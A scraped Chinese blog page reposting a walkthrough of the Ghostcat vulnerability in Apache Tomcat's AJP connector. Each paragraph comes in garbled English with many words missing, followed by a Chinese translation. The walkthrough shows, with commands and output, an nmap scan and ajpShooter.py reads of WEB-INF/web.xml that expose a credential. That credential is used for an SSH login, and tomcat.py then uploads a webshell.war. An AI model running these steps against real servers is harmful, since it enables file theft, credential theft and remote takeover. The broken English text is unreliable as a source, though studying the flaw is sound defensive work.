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ghostcat_狩猎和利用Apache Ghostcat

2023-12-23 大全 22 作者:考证青年

The is a file which came out in the first of this year while the world was up for a fight up the .


It any to read files such as files , test files or any other files . In , if a any user to files, an can the file JSP code to the and then the file by the , in code . Well like the ’s of this bug has also been there since a long long time and has to be until the past. The of the short blog post is to , and this bug.

它允许任何攻击者读取文件,例如配置文件,测试文件或任何其他目录文件。 此外,如果受害网站允许任何用户上传文件,则攻击者可以将包含恶意JSP代码的文件上传到服务器,然后利用漏洞包含上传的文件,从而导致远程执行代码。 就像冠状病毒的病毒家族一样,这个幽灵猫漏洞也已经存在很长时间了,直到最近才被发现。 简短博客文章的上下文旨在理解,识别和利用这个臭名昭著的错误。

The idea of a has ports set up . There’s of the 8080 HTTP port. Then there is known port 8009 which runs the AJP ( JServ ) . It is a and for .

服务器的总体思路是设置了不同的端口。 当然,还有8080 HTTP Web服务端口。 然后还有另一个鲜为人知的端口8009,它运行AJP( JServ协议)服务。 它本质上是通过实现的服务,并允许执行不同的操作。

What is the AJP fuss all about…?


Well, the AJP is a that for an in to the HTTP. It is to HTTP but at a level. Since it is , the level is far more than the HTTP . In short , AJP will be used due to:

好吧,AJP是一种二进制协议,与HTTP相比,它减少了应用程序服务器的开销。 它类似于HTTP,但处于二进制级别。 由于它是二进制的,因此机器级别的转换比HTTP解析要快得多。 简而言之,由于以下原因,将使用AJP连接器:

It being and by by . 它由默认实现和公开。 More in and load front end and . 反向代理中的更多持久性要求前端和后端应用程序服务器之间的性能和负载平衡。 ’s rich API level the to push for more i.e; HTTP(S) data is and can be with API calls(like ()). 丰富的API级别实现使开发人员倍受青睐,以推动更快的协议遍历。 HTTP(S)数据是无缝的,可以通过简单的API调用(例如规范的())进行检索。 AJP you to skip the and pass of the the proxy and the app . AJP允许您跳过其他解析,并在代理服务器和应用程序服务器之间传递请求标头的有效二进制解释。

Ways to the


You can use the tool by the that have the . (Link: )

您可以使用已发布发现的研究人员的在线检测工具。 (链接: https : ///en/ )

2. The way.


The way of it:


As in any test we do an Nmap scan to open ports.


sh-3.2# nmap -sS -sV -T2 Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:54 ISTNmap scan report for is up (0.19s latency).Not shown: 996 closed portsPORT     STATE SERVICE    VERSION22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)53/tcp   open  tcpwrapped8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)8080/tcp open  http       Apache Tomcat 9.0.30Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

6.x, 7.x, 8.x, and 9.x are found to be to this issue.

发现 6.x,7.x,8.x和9.x版本容易受到此问题的攻击。

Once we find the ports in the above you can head to this page: and run the .

找到上面结果中突出显示的所需端口后,您可以转到以下漏洞利用页面: https : ////-CNVD-2020-10487 。 并运行 。

sh-3.2# python3 ajpShooter.py 8009 /WEB-INF read[<] 302 302[<] Location: /index.txt/[<] Content-Length: 0

We are able to . Now we can try to files from the WEB-INF such as web.xml

我们能够检索信息。 现在我们可以尝试从WEB-INF文件夹中检索某些常见文件,例如web.xml

sh-3.2# python3 ajpShooter.py 8009 /WEB-INF/web.xml read
[<] 200 200[<] Accept-Ranges: bytes[<] ETag: W/"1261-1583902632000"[<] Last-Modified: Wed, 21 Apr 2020 04:57:12 GMT[<] Content-Type: application/xml[<] Content-Length: 1261Welcome to TomcatWelcome to ECorpECorp:8730281lkjlkjdqlksalks

We found a (ks)that as key which could be used to login to ECorp with a key via an SSH .

我们发现了一个字符串( ks ),该字符串作为密钥出现,可以用于通过SSH会话使用密钥登录到名为ECorp的系统。

sh-3.2# ssh ECorp@ authenticity of host ' (' can't be established.ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '' (ECDSA) to the list of known hosts.ECorp@'s password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantageThe programs included with the Ubuntu system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted byapplicable law.ECorp@ubuntu:~$ whoamiECorpE-Foundation@ubuntu:/etc$ uname -a
Linux ubuntu 4.4.0-174-generic #204-Ubuntu SMP Wed Apr 29 06:41:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

That’s it we can own the and from the user ECorp and can also look for root level if there are any in the .


If the files as well which is in , then we can WAR files such as :


$ python tomcat.py upload -u tomcat -p tomcat webshell.war 

and gain a code using this issue.


More on it here: ()





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